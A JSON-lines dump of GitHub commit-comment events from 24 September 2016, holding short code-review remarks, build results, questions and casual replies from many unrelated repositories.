{"id":"4613211007","type":"CommitCommentEvent","actor":{"login":"devernay"},"repo":{"name":"devernay/openfx-misc"},"payload":{"comment":{"id":19160743,"position":null,"line":null,"path":null,"commit_id":"211bb957b88697b32b95b23f72f1a1db53fafdb0","created_at":"2016-09-24T21:29:37Z","updated_at":"2016-09-24T21:29:37Z","body":"These are two separate processes, so feel free to make a pyplug. There are many keyers and many denoisers, so I think it's best to keep them separate\nLe 24 sept. 2016 8:33 AM, Omar Brown <notifications@github.com> a écrit :Is it possible or a need for the keying nodes to have their own noise/grain reduction implemented in them instead of having to use a separate node?\r\n\r\n—You are receiving this because you authored the thread.Reply to this email directly, view it on GitHub, or mute the thread."}},"created_at":"2016-09-24T21:29:37Z"}
{"id":"4613214781","type":"CommitCommentEvent","actor":{"login":"MushinZero"},"repo":{"name":"ethankaminski/hackmud_sample_scripts"},"payload":{"comment":{"id":19160777,"position":null,"line":null,"path":null,"commit_id":"c886b7b0552c61d56a19d640fa0e8805b22be323","created_at":"2016-09-24T21:32:13Z","updated_at":"2016-09-24T21:32:13Z","body":"No worries, I am not a very experienced programmer so feel free. Id actually like to make another example that is as small as possible as my next learning project. If you have any suggestions for that or for this one to make it more basic they would be welcome."}},"created_at":"2016-09-24T21:32:13Z"}
{"id":"4613215665","type":"CommitCommentEvent","actor":{"login":"Darksynx"},"repo":{"name":"stefan-loewe/WinBinder"},"payload":{"comment":{"id":19160781,"position":null,"line":null,"path":null,"commit_id":"7435b517be103c6ba68e57573185b0d373a16466","created_at":"2016-09-24T21:32:47Z","updated_at":"2016-09-24T21:32:47Z","body":"PHP7をEXEにコンパイルする方法（PHP7＋WinBinder＋VBS）Add Star\r\n\r\nhttp://d.hatena.ne.jp/tukihatu/20151229/1451373607#phpexeuse\r\n\r\nphp_winbinder.dll VC14 php7\r\nhttps://docs.google.com/uc?authuser=0&id=0B76nq_y0gvBpcHVuR003UlRIZnM&export=download\r\n"}},"created_at":"2016-09-24T21:32:47Z"}
{"id":"4613216200","type":"CommitCommentEvent","actor":{"login":"ochrons"},"repo":{"name":"scalafiddle/scalafiddle-editor"},"payload":{"comment":{"id":19160782,"position":null,"line":null,"path":null,"commit_id":"262c376f0e6206142720797a7389bc7e459e0ff8","created_at":"2016-09-24T21:33:11Z","updated_at":"2016-09-24T21:33:11Z","body":"Fixes #29 "}},"created_at":"2016-09-24T21:33:11Z"}
{"id":"4613217386","type":"CommitCommentEvent","actor":{"login":"hunter32292"},"repo":{"name":"jensongm/jensongm.github.io"},"payload":{"comment":{"id":19160787,"position":null,"line":null,"path":null,"commit_id":"07d2d4a436e93d784cb77b71dbdc941091074c73","created_at":"2016-09-24T21:34:05Z","updated_at":"2016-09-24T21:34:05Z","body":"❤️ "}},"created_at":"2016-09-24T21:34:05Z"}
{"id":"4613218287","type":"CommitCommentEvent","actor":{"login":"hunter32292"},"repo":{"name":"jensongm/jensongm.github.io"},"payload":{"comment":{"id":19160790,"position":null,"line":null,"path":null,"commit_id":"07d2d4a436e93d784cb77b71dbdc941091074c73","created_at":"2016-09-24T21:34:46Z","updated_at":"2016-09-24T21:34:46Z","body":"Should jump in the IRC if you wanna talk about page's sites"}},"created_at":"2016-09-24T21:34:46Z"}
{"id":"4613219697","type":"CommitCommentEvent","actor":{"login":"alvagante"},"repo":{"name":"example42/puppet-yum"},"payload":{"comment":{"id":19160795,"position":null,"line":null,"path":null,"commit_id":"a78f786199b39fc2996386ab4125d4fea8972357","created_at":"2016-09-24T21:35:46Z","updated_at":"2016-09-24T21:35:46Z","body":"See #166 and actually we dont really need to contain the subclasses. Eventually it could be advisable to \r\n\r\n```\r\ncontaint yum\r\n```"}},"created_at":"2016-09-24T21:35:46Z"}
{"id":"4613223209","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":19160812,"position":null,"line":null,"path":null,"commit_id":"12fb3171436f0de111960a91154806b8cc6135ac","created_at":"2016-09-24T21:38:10Z","updated_at":"2016-09-24T21:38:10Z","body":"could you give some examples of which quests this breaks?"}},"created_at":"2016-09-24T21:38:10Z"}
{"id":"4613224302","type":"CommitCommentEvent","actor":{"login":"flexiondotorg"},"repo":{"name":"mate-desktop/mate-applets"},"payload":{"comment":{"id":19160818,"position":null,"line":null,"path":null,"commit_id":"a708224decae0f7417aa38b926318fa32747b161","created_at":"2016-09-24T21:38:56Z","updated_at":"2016-09-24T21:38:56Z","body":"I've added a patch to the Debian/Ubuntu package based on what @kajzersoze said in the first comment. As a result mate-applets builds but the cpufreq applet doesn't work."}},"created_at":"2016-09-24T21:38:56Z"}
{"id":"4613224804","type":"CommitCommentEvent","actor":{"login":"Julinho"},"repo":{"name":"Julinho/Host-4reyes"},"payload":{"comment":{"id":19160820,"position":null,"line":null,"path":null,"commit_id":"de26cb67cebedb2150c5fca1bd0b903dc254af4d","created_at":"2016-09-24T21:39:16Z","updated_at":"2016-09-24T21:39:16Z","body":"provando comentarios"}},"created_at":"2016-09-24T21:39:16Z"}
{"id":"4613230870","type":"CommitCommentEvent","actor":{"login":"Darksynx"},"repo":{"name":"stefan-loewe/WinBinder"},"payload":{"comment":{"id":19160843,"position":null,"line":null,"path":null,"commit_id":"7435b517be103c6ba68e57573185b0d373a16466","created_at":"2016-09-24T21:43:54Z","updated_at":"2016-09-24T21:43:54Z","body":"test php winbinder \r\n\r\n[WinBinder_PHP-7-0.zip](https://github.com/stefan-loewe/WinBinder/files/491363/WinBinder_PHP-7-0.zip)\r\n\r\n\r\nWinBinder_PHP-7-0.zip SHA-512\r\n1D134DF4B8DD594A2B9535A831BE9FFBC8FB59465FCC48B91CFD19B8BF4DB75CEF5E4420F435E3A6CDA9D8F9F4821A0B8B3D0B2D178D3093EA601898C6C83D4F\r\n"}},"created_at":"2016-09-24T21:43:54Z"}
{"id":"4613232673","type":"CommitCommentEvent","actor":{"login":"crutchcorn"},"repo":{"name":"TheAndroidMaster/Tables"},"payload":{"comment":{"id":19160851,"position":null,"line":null,"path":null,"commit_id":"e87c66ce585acdaa9fddd3fbcf587c64eaf15484","created_at":"2016-09-24T21:45:16Z","updated_at":"2016-09-24T21:45:16Z","body":"WHO NEEDS CREDIT? I DON'T NEED CREDIT\r\n\r\nAlso, I love how you tool my mis-type and made it the actual variable"}},"created_at":"2016-09-24T21:45:16Z"}
{"id":"4613237095","type":"CommitCommentEvent","actor":{"login":"ForTheEpicWin"},"repo":{"name":"nusje2000/LocalGhost"},"payload":{"comment":{"id":19160870,"position":null,"line":null,"path":null,"commit_id":"1194203d5083860cd50c1f2ffbc50f66045e9860","created_at":"2016-09-24T21:49:02Z","updated_at":"2016-09-24T21:49:02Z","body":"Who is this?"}},"created_at":"2016-09-24T21:49:02Z"}
{"id":"4613237893","type":"CommitCommentEvent","actor":{"login":"timabbott"},"repo":{"name":"zulip/zulip"},"payload":{"comment":{"id":19160873,"position":null,"line":null,"path":null,"commit_id":"8cdc5b7a027d0f3c4e1856d9d5cefcc625c61392","created_at":"2016-09-24T21:49:41Z","updated_at":"2016-09-24T21:49:41Z","body":"The issue was that `lstrip` takes a list of characters and removes any copies of those characters in the string,  not (as one might have thought) removing that substring from the start of the string.  \r\n\r\n```\r\nIn [2]: 'asdsssqzgsaas'.lstrip(\"sad\")\r\nOut[2]: 'qzgsaas'\r\n```\r\n\r\nThis `refs/heads` shows up in the test fixture file, `zerver/fixtures/gitlab/gitlab_push.json`, and just happened to not be affected by this bug, because the branch in that test fixture, `refs/heads/tomek`, has a name starting with `t`, which is not present in the string `refs/heads`.\r\n\r\n"}},"created_at":"2016-09-24T21:49:41Z"}
{"id":"4613238630","type":"CommitCommentEvent","actor":{"login":"ThisTestUser"},"repo":{"name":"ThisTestUser/Docs"},"payload":{"comment":{"id":19160883,"position":null,"line":null,"path":null,"commit_id":"ee739e1721641f4655aafd3d0cddd9b7defd69f0","created_at":"2016-09-24T21:50:16Z","updated_at":"2016-09-24T21:50:16Z","body":"Yeah, I really don't know how they do it, they don't tell you much about your ban (and what caught it).\r\nOn another note, the adf.ly links from go.wolfram-client.tk give you a pop-up everytime you click \"go\". Has this been happening to you?\r\n"}},"created_at":"2016-09-24T21:50:16Z"}
{"id":"4613239217","type":"CommitCommentEvent","actor":{"login":"polluks"},"repo":{"name":"cc65/cc65"},"payload":{"comment":{"id":19160888,"position":44,"line":186,"path":"doc/pce.sgml","commit_id":"996c7b493e6111533b8c919b98b49cf7ce29bc45","created_at":"2016-09-24T21:50:46Z","updated_at":"2016-09-24T21:50:46Z","body":"shorter http://www.romhacking.net/?page=documents&platform=4"}},"created_at":"2016-09-24T21:50:46Z"}
{"id":"4613242160","type":"CommitCommentEvent","actor":{"login":"discobeta"},"repo":{"name":"discobeta/PS110Mobile"},"payload":{"comment":{"id":19160909,"position":null,"line":null,"path":null,"commit_id":"d39708ad3b985f4a6bb351be9aa0bf40e485fa4d","created_at":"2016-09-24T21:53:16Z","updated_at":"2016-09-24T21:53:16Z","body":"    New Splash Icon\r\n    New Launch Icon\r\n    Removed APK files from the repository\r\n    New Date Format\r\n    Automatic Parsing of Event Duration\r\n    UI and UX Improvements\r\n"}},"created_at":"2016-09-24T21:53:16Z"}
{"id":"4613243471","type":"CommitCommentEvent","actor":{"login":"abettermap"},"repo":{"name":"CodeForFoco/bike-coop-theme"},"payload":{"comment":{"id":19160914,"position":null,"line":null,"path":null,"commit_id":"ad9ebd869d676764cc6fb8e89d9d881fde1a8dbe","created_at":"2016-09-24T21:54:21Z","updated_at":"2016-09-24T21:54:21Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Theme -- Header/Nav/Links](https://trello.com/c/IYMKL3mo/5-theme-header-nav-links)"}},"created_at":"2016-09-24T21:54:21Z"}
{"id":"4613244991","type":"CommitCommentEvent","actor":{"login":"ensureLuke"},"repo":{"name":"ensureLuke/hello-world"},"payload":{"comment":{"id":19160919,"position":null,"line":null,"path":null,"commit_id":"595df1b7847acbcb5537938810b5f56742dd96f3","created_at":"2016-09-24T21:55:32Z","updated_at":"2016-09-24T21:55:32Z","body":"i approve of this message!"}},"created_at":"2016-09-24T21:55:32Z"}
{"id":"4613248036","type":"CommitCommentEvent","actor":{"login":"berlot83"},"repo":{"name":"berlot83/codes"},"payload":{"comment":{"id":19160930,"position":null,"line":null,"path":null,"commit_id":"3bc01d67ec00caa966f68173a312626ea15ebf0a","created_at":"2016-09-24T21:58:10Z","updated_at":"2016-09-24T21:58:10Z","body":"En esta carpeta se van a grabar todos aquellos archivos subidos por el usuario, en forma de imagen."}},"created_at":"2016-09-24T21:58:10Z"}
{"id":"4613248883","type":"CommitCommentEvent","actor":{"login":"TheAndroidMaster"},"repo":{"name":"TheAndroidMaster/Tables"},"payload":{"comment":{"id":19160933,"position":null,"line":null,"path":null,"commit_id":"2dee4b18c4ff44db9d8cc908b983d8eca6018528","created_at":"2016-09-24T21:58:49Z","updated_at":"2016-09-24T21:58:49Z","body":"@crutchcorn :+1: "}},"created_at":"2016-09-24T21:58:49Z"}
{"id":"4613249653","type":"CommitCommentEvent","actor":{"login":"mootpoint"},"repo":{"name":"FozLand/chat_next"},"payload":{"comment":{"id":19160938,"position":null,"line":null,"path":null,"commit_id":"ae94d59ab5c67f727864ddc89c33d90d132a5727","created_at":"2016-09-24T21:59:26Z","updated_at":"2016-09-24T21:59:26Z","body":"Thanks :) now you got me curious. We have fixed a lot of things this week. When will these get added?"}},"created_at":"2016-09-24T21:59:26Z"}
{"id":"4613249832","type":"CommitCommentEvent","actor":{"login":"crutchcorn"},"repo":{"name":"TheAndroidMaster/Tables"},"payload":{"comment":{"id":19160939,"position":null,"line":null,"path":null,"commit_id":"2dee4b18c4ff44db9d8cc908b983d8eca6018528","created_at":"2016-09-24T21:59:36Z","updated_at":"2016-09-24T21:59:36Z","body":"😎 "}},"created_at":"2016-09-24T21:59:36Z"}
{"id":"4613250170","type":"CommitCommentEvent","actor":{"login":"Jorge-Ramos"},"repo":{"name":"Jorge-Ramos/Mytest"},"payload":{"comment":{"id":19160942,"position":null,"line":null,"path":null,"commit_id":"85b2b20293729f1589492bf6e82f9c49c534648e","created_at":"2016-09-24T21:59:51Z","updated_at":"2016-09-24T21:59:51Z","body":"This could be the begin of a new era!"}},"created_at":"2016-09-24T21:59:51Z"}
{"id":"4613251664","type":"CommitCommentEvent","actor":{"login":"Sim-fff"},"repo":{"name":"Sim-fff/Blackaksay"},"payload":{"comment":{"id":19160946,"position":null,"line":null,"path":null,"commit_id":"f692c42ae764d0e71e0713fa8d812ef166ce58c6","created_at":"2016-09-24T22:00:40Z","updated_at":"2016-09-24T22:00:40Z","body":"![2016 09 23 09 46 11](https://cloud.githubusercontent.com/assets/22250832/18811528/6ad42d90-82bb-11e6-9a53-e43db57af942.jpg)\r\n"}},"created_at":"2016-09-24T22:00:40Z"}
{"id":"4613251723","type":"CommitCommentEvent","actor":{"login":"jhcole"},"repo":{"name":"FozLand/chat_next"},"payload":{"comment":{"id":19160947,"position":null,"line":null,"path":null,"commit_id":"ae94d59ab5c67f727864ddc89c33d90d132a5727","created_at":"2016-09-24T22:00:43Z","updated_at":"2016-09-24T22:00:43Z","body":"As soon as a notice 2 or less players on the server."}},"created_at":"2016-09-24T22:00:43Z"}
{"id":"4613255949","type":"CommitCommentEvent","actor":{"login":"ertugrulozcan"},"repo":{"name":"ertugrulozcan/Aero.Cryptography"},"payload":{"comment":{"id":19160965,"position":null,"line":null,"path":null,"commit_id":"2c238ca4652ddb7dc361ae67c51d7d3c683bcb82","created_at":"2016-09-24T22:03:56Z","updated_at":"2016-09-24T22:03:56Z","body":"Fix : Contracts namespace moved. Not algorithms."}},"created_at":"2016-09-24T22:03:56Z"}
{"id":"4613256652","type":"CommitCommentEvent","actor":{"login":"aaronjwood"},"repo":{"name":"aaronjwood/PortAuthority"},"payload":{"comment":{"id":19160967,"position":32,"line":0,"path":"app/src/main/java/com/aaronjwood/portauthority/network/Wireless.java","commit_id":"20a468e4af4c63ba60a798c8f30a6816a1eca7f4","created_at":"2016-09-24T22:04:28Z","updated_at":"2016-09-24T22:04:28Z","body":"Can we support all the possible netmasks? "}},"created_at":"2016-09-24T22:04:28Z"}
{"id":"4613257565","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19160973,"position":null,"line":null,"path":null,"commit_id":"35a865c0ed7a7c097ee555588e66630c76892064","created_at":"2016-09-24T22:05:16Z","updated_at":"2016-09-24T22:05:16Z","body":"EMS (brianlball) - Win64-Windows-7-VisualStudio-12: Tests Failed (2119 of 2496 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-35a865c0ed7a7c097ee555588e66630c76892064-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-35a865c0ed7a7c097ee555588e66630c76892064-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-84.9%25-red.svg)</a> \n"}},"created_at":"2016-09-24T22:05:16Z"}
{"id":"4613258375","type":"CommitCommentEvent","actor":{"login":"justinp"},"repo":{"name":"scalawag/jibe"},"payload":{"comment":{"id":19160981,"position":null,"line":null,"path":null,"commit_id":"930a382fdba81ca5e6adc75c3cf4889987dd1e4d","created_at":"2016-09-24T22:05:58Z","updated_at":"2016-09-24T22:05:58Z","body":"@ecassady @dwcramer \r\n\r\nThis is an attempt to integrate the information about the commands that are run and stack traces into logging that can be done by the mandates.  You should be able to run it and play with the results.  If you're feeling industrious, compare the output from branches \"all_logs\" and \"master\" and tell me which style is better.\r\n\r\nI have a preference for all_logs because it makes it easier to see what happened through time as the mandate was executing.  It feels a little less structured, though."}},"created_at":"2016-09-24T22:05:58Z"}
{"id":"4613266774","type":"CommitCommentEvent","actor":{"login":"kajzersoze"},"repo":{"name":"mate-desktop/mate-applets"},"payload":{"comment":{"id":19161013,"position":null,"line":null,"path":null,"commit_id":"a708224decae0f7417aa38b926318fa32747b161","created_at":"2016-09-24T22:13:14Z","updated_at":"2016-09-24T22:13:14Z","body":"@flexiondotorg, interesting, applet works fine after that on gentoo.\r\n-with-cpufreq-lib=cpupower is used btw.\r\n\r\n"}},"created_at":"2016-09-24T22:13:14Z"}
{"id":"4613270360","type":"CommitCommentEvent","actor":{"login":"bmneely"},"repo":{"name":"BrysonRafael/Bloccit"},"payload":{"comment":{"id":19161027,"position":4,"line":19,"path":"db/seeds.rb","commit_id":"a5cb5af226b27552f438e1711017489ca8f44da6","created_at":"2016-09-24T22:16:32Z","updated_at":"2016-09-24T22:16:32Z","body":"There's no need to use `1.times do`, by default everything is just run once when the code runs."}},"created_at":"2016-09-24T22:16:32Z"}
{"id":"4613270995","type":"CommitCommentEvent","actor":{"login":"bmneely"},"repo":{"name":"BrysonRafael/Bloccit"},"payload":{"comment":{"id":19161029,"position":13,"line":28,"path":"db/seeds.rb","commit_id":"a5cb5af226b27552f438e1711017489ca8f44da6","created_at":"2016-09-24T22:17:04Z","updated_at":"2016-09-24T22:17:04Z","body":"`.sample` returns a random post, which means that this will most likely always add a random comment to a random post."}},"created_at":"2016-09-24T22:17:04Z"}
{"id":"4613272100","type":"CommitCommentEvent","actor":{"login":"dakridas"},"repo":{"name":"dakridas/SpefAPI"},"payload":{"comment":{"id":19161032,"position":null,"line":null,"path":null,"commit_id":"f79d4499a5d9676257b0b943807e1a05ed2be41d","created_at":"2016-09-24T22:18:02Z","updated_at":"2016-09-24T22:18:02Z","body":"for c17\r\nbefore commit:  total heap usage: 8,449 allocs, 8,449 frees, 328,120 bytes allocated\r\nafter commit:     total heap usage: 1,472 allocs, 1,472 frees, 168,800 bytes allocated"}},"created_at":"2016-09-24T22:18:02Z"}
{"id":"4613275325","type":"CommitCommentEvent","actor":{"login":"spike11302000"},"repo":{"name":"Codepixl/GLCraft"},"payload":{"comment":{"id":19161042,"position":null,"line":null,"path":null,"commit_id":"be5e7ae3054a551a7428f1f1545a90f916def354","created_at":"2016-09-24T22:20:37Z","updated_at":"2016-09-24T22:20:37Z","body":"i can play in now because of the lag fixes you did"}},"created_at":"2016-09-24T22:20:37Z"}
{"id":"4613276180","type":"CommitCommentEvent","actor":{"login":"ositoletal"},"repo":{"name":"MarcelBY/Project"},"payload":{"comment":{"id":19161045,"position":null,"line":null,"path":null,"commit_id":"dab14a2c30b4be3a0e354fe3ccf25d7cf1e7fdb7","created_at":"2016-09-24T22:21:19Z","updated_at":"2016-09-24T22:21:19Z","body":"Esta muy padre\r\n"}},"created_at":"2016-09-24T22:21:19Z"}
{"id":"4613283708","type":"CommitCommentEvent","actor":{"login":"tejak1"},"repo":{"name":"AzureAD/passport-azure-ad"},"payload":{"comment":{"id":19161075,"position":167,"line":236,"path":"lib/oidcstrategy.js","commit_id":"995a73d9d3b6ba2d92aaf360eb13b96e3613bf68","created_at":"2016-09-24T22:27:53Z","updated_at":"2016-09-24T22:27:53Z","body":"There is no 'policy' in 'options' so far. How can I integrate that option for my web app so that I can use my custom sign-in policy in the configuration file?"}},"created_at":"2016-09-24T22:27:53Z"}
{"id":"4613289851","type":"CommitCommentEvent","actor":{"login":"AlfieC"},"repo":{"name":"PaperMC/Paper"},"payload":{"comment":{"id":19161084,"position":null,"line":null,"path":null,"commit_id":"d3eb13d60dad0ea895ea8eef73216dae955a3fba","created_at":"2016-09-24T22:33:15Z","updated_at":"2016-09-24T22:33:15Z","body":"...why does it?"}},"created_at":"2016-09-24T22:33:15Z"}
{"id":"4613291825","type":"CommitCommentEvent","actor":{"login":"Geyzer7"},"repo":{"name":"Geyzer7/Critical-Path-Solutions"},"payload":{"comment":{"id":19161087,"position":null,"line":null,"path":null,"commit_id":"244deb165064ddc1529b4cc20cc7f1aadc72b108","created_at":"2016-09-24T22:34:43Z","updated_at":"2016-09-24T22:34:43Z","body":"In attempting to derive a solution to a problem or create a new product we are confounded by all the variables and possible pathways to take.\r\nOften it more challenging to identify the best path to take than it is to implement a particular choice of action.\r\nSometimes its necessary to start over to get on a better path, other times its just a matter of know which fork in the road to take."}},"created_at":"2016-09-24T22:34:43Z"}
{"id":"4613292410","type":"CommitCommentEvent","actor":{"login":"sesva"},"repo":{"name":"sesva/MiPymesCloud"},"payload":{"comment":{"id":19161089,"position":null,"line":null,"path":null,"commit_id":"ea39069e6d98a828befd0088bad795f3fa39a664","created_at":"2016-09-24T22:35:10Z","updated_at":"2016-09-24T22:35:10Z","body":"Bien equipo.. mi product manager"}},"created_at":"2016-09-24T22:35:10Z"}
{"id":"4613297551","type":"CommitCommentEvent","actor":{"login":"jgravois"},"repo":{"name":"jgravois/bootstrap-geocoder"},"payload":{"comment":{"id":19161104,"position":null,"line":null,"path":null,"commit_id":"bd1a774f19d43553c98077682b5e652ad3c8dbef","created_at":"2016-09-24T22:39:13Z","updated_at":"2016-09-24T22:39:13Z","body":"check it out @jaccat!"}},"created_at":"2016-09-24T22:39:13Z"}
{"id":"4613299503","type":"CommitCommentEvent","actor":{"login":"tejak1"},"repo":{"name":"AzureAD/passport-azure-ad"},"payload":{"comment":{"id":19161111,"position":null,"line":null,"path":null,"commit_id":"995a73d9d3b6ba2d92aaf360eb13b96e3613bf68","created_at":"2016-09-24T22:41:01Z","updated_at":"2016-09-24T22:41:01Z","body":"There is no 'policy' in 'options' for lib/OIDCstrategy.js. How can I integrate that option so that I can use my custom sign-in policy in the configuration file of my web app ?"}},"created_at":"2016-09-24T22:41:01Z"}
{"id":"4613310751","type":"CommitCommentEvent","actor":{"login":"vivdnp"},"repo":{"name":"StanBondar/JavaCoreGOIT"},"payload":{"comment":{"id":19161137,"position":5,"line":5,"path":"src/Modue3/task2/Adder.java","commit_id":"0544a5611d5cd356b227472d0cd0da1e93e39a4a","created_at":"2016-09-24T22:51:34Z","updated_at":"2016-09-24T22:51:34Z","body":"Эти поля в классе не нужны"}},"created_at":"2016-09-24T22:51:34Z"}
{"id":"4613311102","type":"CommitCommentEvent","actor":{"login":"vivdnp"},"repo":{"name":"StanBondar/JavaCoreGOIT"},"payload":{"comment":{"id":19161139,"position":10,"line":10,"path":"src/Modue3/task2/Adder.java","commit_id":"0544a5611d5cd356b227472d0cd0da1e93e39a4a","created_at":"2016-09-24T22:51:57Z","updated_at":"2016-09-24T22:51:57Z","body":"можно просто return a + b;"}},"created_at":"2016-09-24T22:51:57Z"}
{"id":"4613311562","type":"CommitCommentEvent","actor":{"login":"blueyed"},"repo":{"name":"neomake/neomake"},"payload":{"comment":{"id":19161141,"position":11,"line":185,"path":"autoload/neomake/utils.vim","commit_id":"b49189af6c3b098f6b7df5fc8232b7729bdcc17e","created_at":"2016-09-24T22:52:21Z","updated_at":"2016-09-24T22:52:21Z","body":"@davidosomething \r\nWhat is your `config_var` / `getbufvar(a:bufnr, config_var)` in this case?"}},"created_at":"2016-09-24T22:52:21Z"}
{"id":"4613311751","type":"CommitCommentEvent","actor":{"login":"vivdnp"},"repo":{"name":"StanBondar/JavaCoreGOIT"},"payload":{"comment":{"id":19161143,"position":14,"line":14,"path":"src/Modue3/task2/Arithmetic.java","commit_id":"0544a5611d5cd356b227472d0cd0da1e93e39a4a","created_at":"2016-09-24T22:52:33Z","updated_at":"2016-09-24T22:52:33Z","body":"return a >= b; даст тот же результат"}},"created_at":"2016-09-24T22:52:33Z"}
{"id":"4613312473","type":"CommitCommentEvent","actor":{"login":"vivdnp"},"repo":{"name":"StanBondar/JavaCoreGOIT"},"payload":{"comment":{"id":19161147,"position":8,"line":8,"path":"src/Modue3/task2/Main.java","commit_id":"0544a5611d5cd356b227472d0cd0da1e93e39a4a","created_at":"2016-09-24T22:53:15Z","updated_at":"2016-09-24T22:53:15Z","body":"Тут как бы результат вычисления идет в никуда"}},"created_at":"2016-09-24T22:53:15Z"}
{"id":"4613313551","type":"CommitCommentEvent","actor":{"login":"lihux25"},"repo":{"name":"cms-sw/cmssw"},"payload":{"comment":{"id":19161154,"position":5,"line":74,"path":"Validation/HcalHits/src/HcalSimHitsValidation.cc","commit_id":"735253d7737f33139556f95624a8c06ae90c0790","created_at":"2016-09-24T22:54:17Z","updated_at":"2016-09-24T22:54:17Z","body":"for the range of ieta, probably you can define global constants for ranges of HB, HE and HF in the .h file for the class, so that the histogram ranges do not look like a magic number."}},"created_at":"2016-09-24T22:54:17Z"}
{"id":"4613314352","type":"CommitCommentEvent","actor":{"login":"rohitmanglik"},"repo":{"name":"rohitmanglik/scrap-preprocessor"},"payload":{"comment":{"id":19161156,"position":53,"line":81,"path":"geocodertest.py","commit_id":"a003b81ac86bf502d44491eb1e7be52bae79489c","created_at":"2016-09-24T22:55:06Z","updated_at":"2016-09-24T22:55:06Z","body":"What all parameters are present in returned object from FB?"}},"created_at":"2016-09-24T22:55:06Z"}
{"id":"4613314364","type":"CommitCommentEvent","actor":{"login":"vivdnp"},"repo":{"name":"StanBondar/JavaCoreGOIT"},"payload":{"comment":{"id":19161157,"position":32,"line":32,"path":"src/Modue3/task3/CollegeStudent.java","commit_id":"2a26b8985b6f92cbf608ecd0012dbc8c9951297f","created_at":"2016-09-24T22:55:07Z","updated_at":"2016-09-24T22:55:07Z","body":"пустые конструкторы не всегда нужны"}},"created_at":"2016-09-24T22:55:07Z"}
{"id":"4613314666","type":"CommitCommentEvent","actor":{"login":"rjaffe"},"repo":{"name":"rjaffe/bindertest"},"payload":{"comment":{"id":19161160,"position":null,"line":null,"path":null,"commit_id":"36aa2d4b40cdef819adad48e78be9143c4f3810e","created_at":"2016-09-24T22:55:22Z","updated_at":"2016-09-24T22:55:22Z","body":"More precisely, no need to specify numpy -- it comes with mybinder image"}},"created_at":"2016-09-24T22:55:22Z"}
{"id":"4613315734","type":"CommitCommentEvent","actor":{"login":"lihux25"},"repo":{"name":"cms-sw/cmssw"},"payload":{"comment":{"id":19161164,"position":6,"line":60,"path":"Validation/HcalHits/interface/HcalSimHitStudy.h","commit_id":"bdcb5f63a27dcfbbd5fb1b92d5b52034d269bcf3","created_at":"2016-09-24T22:56:19Z","updated_at":"2016-09-24T22:56:19Z","body":"probably add some comments on what the different Hit, Map and Sum are intended to do"}},"created_at":"2016-09-24T22:56:19Z"}
{"id":"4613316743","type":"CommitCommentEvent","actor":{"login":"lihux25"},"repo":{"name":"cms-sw/cmssw"},"payload":{"comment":{"id":19161167,"position":10,"line":68,"path":"Validation/HcalHits/src/HcalSimHitStudy.cc","commit_id":"bdcb5f63a27dcfbbd5fb1b92d5b52034d269bcf3","created_at":"2016-09-24T22:57:16Z","updated_at":"2016-09-24T22:57:16Z","body":"Similar comments for the magic numbers, please make a global constant for them and give the variable name meaning."}},"created_at":"2016-09-24T22:57:16Z"}
{"id":"4613317031","type":"CommitCommentEvent","actor":{"login":"GittyUpGoGitHub"},"repo":{"name":"GittyUpGoGitHub/TestSite"},"payload":{"comment":{"id":19161168,"position":null,"line":null,"path":null,"commit_id":"2077aebaf19f009e81cf9fb90177e57ed4c741e9","created_at":"2016-09-24T22:57:34Z","updated_at":"2016-09-24T22:57:34Z","body":"Added NEW into test.js files"}},"created_at":"2016-09-24T22:57:34Z"}
{"id":"4613317749","type":"CommitCommentEvent","actor":{"login":"vivdnp"},"repo":{"name":"StanBondar/JavaCoreGOIT"},"payload":{"comment":{"id":19161172,"position":23,"line":23,"path":"src/Modue3/task4/User.java","commit_id":"4e2aa82f4a2bebc6816d3905f4f806418c68d400","created_at":"2016-09-24T22:58:12Z","updated_at":"2016-09-24T22:58:12Z","body":"не нужная переменная"}},"created_at":"2016-09-24T22:58:12Z"}
{"id":"4613317959","type":"CommitCommentEvent","actor":{"login":"rohitmanglik"},"repo":{"name":"rohitmanglik/scrap-preprocessor"},"payload":{"comment":{"id":19161173,"position":73,"line":253,"path":"geocodertest.py","commit_id":"a003b81ac86bf502d44491eb1e7be52bae79489c","created_at":"2016-09-24T22:58:22Z","updated_at":"2016-09-24T22:58:22Z","body":"First check whether we already have this value and only if we don't have that value, update it."}},"created_at":"2016-09-24T22:58:22Z"}
{"id":"4613319235","type":"CommitCommentEvent","actor":{"login":"vivdnp"},"repo":{"name":"StanBondar/JavaCoreGOIT"},"payload":{"comment":{"id":19161176,"position":28,"line":28,"path":"src/Modue3/task4/User.java","commit_id":"4e2aa82f4a2bebc6816d3905f4f806418c68d400","created_at":"2016-09-24T22:59:37Z","updated_at":"2016-09-24T22:59:37Z","body":"Ты получаешь сумму снятия в метод и первым делом меняешь ее на 2000 - смысл?"}},"created_at":"2016-09-24T22:59:37Z"}
{"id":"4613319522","type":"CommitCommentEvent","actor":{"login":"rohitmanglik"},"repo":{"name":"rohitmanglik/scrap-preprocessor"},"payload":{"comment":{"id":19161177,"position":93,"line":273,"path":"geocodertest.py","commit_id":"a003b81ac86bf502d44491eb1e7be52bae79489c","created_at":"2016-09-24T22:59:54Z","updated_at":"2016-09-24T22:59:54Z","body":"It's good to print all the errors while debugging. When you commit your code, remove or comment all print statements. Also put some stats."}},"created_at":"2016-09-24T22:59:54Z"}
{"id":"4613319683","type":"CommitCommentEvent","actor":{"login":"subba560"},"repo":{"name":"subba560/7Peaks"},"payload":{"comment":{"id":19161180,"position":1,"line":1,"path":"README.md","commit_id":"50f2021ab656008ec8e223eea6b55e25cdf611ca","created_at":"2016-09-24T23:00:02Z","updated_at":"2016-09-24T23:00:02Z","body":"+# 7Peaks23"}},"created_at":"2016-09-24T23:00:02Z"}
